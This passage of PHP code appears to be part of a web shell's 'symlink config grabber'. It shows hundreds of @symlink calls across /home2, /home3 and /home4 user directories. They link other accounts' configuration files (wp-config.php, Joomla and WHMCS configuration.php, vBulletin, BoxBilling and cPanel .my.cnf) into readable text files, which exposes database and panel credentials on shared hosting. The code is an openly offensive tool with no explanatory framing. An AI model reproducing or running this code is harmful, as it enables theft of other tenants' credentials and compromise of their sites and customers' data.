                                                                    @symlink('/home2/' . $user . '/public_html/zencart/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/products/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/cart/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/shop/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/hostbills/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/host/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/Host/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/supportes/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/support/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/hosting/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/cart/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/order/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/client/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/clients/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/cliente/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/clientes/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/billing/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/billings/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/my/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/secure/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/support/order/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home2/' . $user . '/.my.cnf', $user . '-Cpanel.txt');
                                                                    @symlink('/home2/' . $user . '/public_html/po-content/config.php', $user . '-Popoji.txt');
                                                                    //Home3
                                                                    @symlink('/home3/' . $user . '/public_html/vb/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/forum/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/forums/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/cc/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/inc/config.php', $user . '-MyBB.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/shop/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/os/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/oscom/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/products/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/cart/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/inc/conf_global.php', $user . '-IPB.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/wp/test/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/blog/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/beta/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/portal/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/site/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/wp/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/WP/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/news/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/wordpress/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/test/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/demo/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/home/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/v1/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/v2/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/press/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/new/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/blogs/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/blog/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/submitticket.php', $user . '-^WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/cms/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/beta/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/portal/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/site/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/main/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/home/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/demo/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/test/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/v1/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/v2/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/joomla/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/new/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/WHMCS/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/whmcs1/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/Whmcs/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/whmcs/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/whmcs/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/WHMC/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/Whmc/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/whmc/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/WHM/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/Whm/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/whm/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/HOST/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/Host/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/host/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/SUPPORTES/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/Supportes/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/supportes/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/domains/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/domain/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/Hosting/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/HOSTING/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/hosting/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/CART/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/Cart/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/cart/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/ORDER/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/Order/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/order/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/CLIENT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/Client/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/client/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/CLIENTAREA/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/Clientarea/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/clientarea/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/SUPPORT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/Support/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/support/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/BILLING/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/Billing/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/billing/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/BUY/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/Buy/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/buy/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/MANAGE/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/Manage/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/manage/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/CLIENTSUPPORT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/ClientSupport/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/Clientsupport/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/clientsupport/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/CHECKOUT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/Checkout/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/checkout/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/BILLINGS/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/Billings/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/billings/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/BASKET/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/Basket/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/basket/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/SECURE/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/Secure/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/secure/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/SALES/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/Sales/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/sales/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/BILL/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/Bill/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/bill/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/PURCHASE/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/Purchase/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/purchase/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/ACCOUNT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/Account/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/account/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/USER/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/User/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/user/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/CLIENTS/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/Clients/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/clients/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/BILLINGS/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/Billings/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/billings/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/MY/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/My/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/my/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/secure/whm/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/secure/whmcs/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/panel/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/clientes/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/cliente/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/support/order/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/boxbilling/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/box/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/host/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/Host/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/supportes/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/support/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/hosting/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/cart/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/order/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/client/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/clients/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/cliente/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/clientes/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/billing/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/billings/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/my/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/secure/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/support/order/bb-config.php', $user . '-BoxBilling.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/zencart/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/products/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/cart/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/shop/includes/dist-configure.php', $user . '-Zencart.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/hostbills/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/host/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/Host/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/supportes/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/support/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/hosting/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/cart/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/order/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/client/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/clients/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/cliente/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/clientes/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/billing/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/billings/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/my/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/secure/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/support/order/includes/iso4217.php', $user . '-Hostbills.txt');
                                                                    @symlink('/home3/' . $user . '/.my.cnf', $user . '-Cpanel.txt');
                                                                    @symlink('/home3/' . $user . '/public_html/po-content/config.php', $user . '-Popoji.txt');
                                                                    //Home4
                                                                    @symlink('/home4/' . $user . '/public_html/vb/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/forum/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/forums/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/cc/includes/config.php', $user . '-Vbulletin.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/inc/config.php', $user . '-MyBB.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/shop/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/os/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/oscom/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/products/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/cart/includes/configure.php', $user . '-OsCommerce.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/inc/conf_global.php', $user . '-IPB.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/wp/test/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/blog/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/beta/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/portal/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/site/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/wp/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/WP/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/news/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/wordpress/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/test/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/demo/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/home/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/v1/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/v2/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/press/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/new/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/blogs/wp-config.php', $user . '-Wordpress.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/blog/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/submitticket.php', $user . '-^WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/cms/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/beta/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/portal/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/site/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/main/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/home/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/demo/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/test/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/v1/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/v2/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/joomla/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/new/configuration.php', $user . '-Joomla.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/WHMCS/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/whmcs1/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/Whmcs/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/whmcs/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/whmcs/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/WHMC/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/Whmc/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/whmc/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/WHM/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/Whm/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/whm/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/HOST/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/Host/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/host/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/SUPPORTES/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/Supportes/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/supportes/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/domains/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/domain/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/Hosting/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/HOSTING/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/hosting/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/CART/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/Cart/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/cart/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/ORDER/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/Order/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/order/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/CLIENT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/Client/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/client/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/CLIENTAREA/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/Clientarea/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/clientarea/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/SUPPORT/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/Support/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/support/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/BILLING/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/Billing/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/billing/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/BUY/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/Buy/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/buy/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/MANAGE/configuration.php', $user . '-WHMCS.txt');
                                                                    @symlink('/home4/' . $user . '/public_html/Manage/configuration.php', $user . '-WHMCS.txt');
